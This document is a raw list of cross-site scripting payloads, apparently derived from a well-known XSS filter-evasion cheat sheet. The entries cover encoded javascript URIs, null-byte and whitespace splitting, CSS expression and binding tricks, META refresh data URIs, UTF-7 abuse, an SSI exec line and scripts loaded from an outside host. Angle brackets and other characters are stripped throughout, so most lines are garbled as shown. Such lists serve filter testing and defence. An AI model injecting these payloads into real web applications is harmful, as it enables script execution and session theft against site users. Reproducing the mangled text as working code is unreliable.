SCRIPTalert('XSS');SCRIPT
'';!--XSS=&{()}
SCRIPT SRC=httpxss.rocksxss.jsSCRIPT
IMG SRC=javascriptalert('XSS');
IMG SRC=javascriptalert('XSS')
IMG SRC=JaVaScRiPtalert('XSS')
IMG SRC=javascriptalert(&quot;XSS&quot;)
IMG SRC=`javascriptalert(RSnake says, 'XSS')`
IMG SRC=javascriptalert(String.fromCharCode(88,83,83))
SRC=&#10IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;
IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041
IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29
IMG SRC=jav	ascriptalert('XSS');
IMG SRC=jav&#x09;ascriptalert('XSS');
IMG SRC=jav&#x0A;ascriptalert('XSS');
IMG SRC=jav&#x0D;ascriptalert('XSS');
IMG SRC= &#14;  javascriptalert('XSS');
IMG%0aSRC%0a=%0a%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a%0a
IMG SRC=java%00scriptalert(XSS)
SCR%00IPTalert(XSS)SCR%00IPT
SCRIPTXSS SRC=httpxss.rocksxss.jsSCRIPT
SCRIPT SRC=httpxss.rocksxss.jsSCRIPT
INPUT TYPE=IMAGE SRC=javascriptalert('XSS');
BODY BACKGROUND=javascriptalert('XSS')
BODY ONLOAD=alert('XSS')
IMG DYNSRC=javascriptalert('XSS')
IMG LOWSRC=javascriptalert('XSS')
BGSOUND SRC=javascriptalert('XSS');
BR SIZE=&{alert('XSS')}
LAYER SRC=httpxss.rocksscriptlet.htmlLAYER
LINK REL=stylesheet HREF=javascriptalert('XSS');
LINK REL=stylesheet HREF=httpxss.rocksxss.css
STYLE@import'httpxss.rocksxss.css';STYLE
META HTTP-EQUIV=Link Content=httpxss.rocksxss.css; REL=stylesheet
STYLEBODY{-moz-bindingurl(httpxss.rocksxssmoz.xml#xss)}STYLE
IMG SRC='vbscriptmsgbox(XSS)'
IMG SRC=mocha[code]
IMG SRC=livescript[code]
META HTTP-EQUIV=refresh CONTENT=0;url=javascriptalert('XSS');
META HTTP-EQUIV=refresh CONTENT=0;url=datatexthtml;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
META HTTP-EQUIV=Link Content=javascriptalert('XSS'); REL=stylesheet
META HTTP-EQUIV=refresh CONTENT=0; URL=http;URL=javascriptalert('XSS');
IFRAME SRC=javascriptalert('XSS');IFRAME
FRAMESETFRAME SRC=javascriptalert('XSS');FRAMESET
TABLE BACKGROUND=javascriptalert('XSS')
DIV STYLE=background-image url(javascriptalert('XSS'))
DIV STYLE=background-image url(&#1;javascriptalert('XSS'))
DIV STYLE=width expression(alert('XSS'));
STYLE@import'javascriptalert(XSS)';STYLE
IMG STYLE=xssexprXSSession(alert('XSS'))
XSS STYLE=xssexpression(alert('XSS'))
expXSS STYLE='noxssnoxss();
STYLE TYPE=textjavascriptalert('XSS');STYLE
STYLE.XSS{background-imageurl(javascriptalert('XSS'));}STYLEA CLASS=XSSA
STYLE type=textcssBODY{backgroundurl(javascriptalert('XSS'))}STYLE
BASE HREF=javascriptalert('XSS');
OBJECT TYPE=textx-scriptlet DATA=httpxss.rocksscriptlet.htmlOBJECT
OBJECT classid=clsidae24fdae-03c6-11d1-8b76-0080c744f389param name=url value=javascriptalert('XSS')OBJECT
getURL(javascriptalert('XSS'))
a=get;
!--value![CDATA[XML ID=IXC![CDATA[IMG SRC=javas![CDATA[criptalert('XSS');
XML SRC=httpxss.rocksxsstest.xml ID=IXML
HTMLBODY
SCRIPT SRC=httpxss.rocksxss.jpgSCRIPT
!--#exec cmd=binecho 'SCRIPT SRC'--!--#exec cmd=binecho '=httpxss.rocksxss.jsSCRIPT'--
 echo('SCR)';
META HTTP-EQUIV=Set-Cookie Content=USERID=&lt;SCRIPT&gt;alert('XSS')&lt;SCRIPT&gt;
HEADMETA HTTP-EQUIV=CONTENT-TYPE CONTENT=texthtml; charset=UTF-7 HEAD+ADw-SCRIPT+AD4-alert('XSS');+ADw-SCRIPT+AD4-
SCRIPT a= SRC=httpxss.rocksxss.jsSCRIPT
SCRIPT a= '' SRC=httpxss.rocksxss.jsSCRIPT
SCRIPT a='' SRC=httpxss.rocksxss.jsSCRIPT
SCRIPT a=`` SRC=httpxss.rocksxss.jsSCRIPT
SCRIPTdocument.write(SCRI);SCRIPTPT SRC=xss.rocksxss.jsSCRIPT
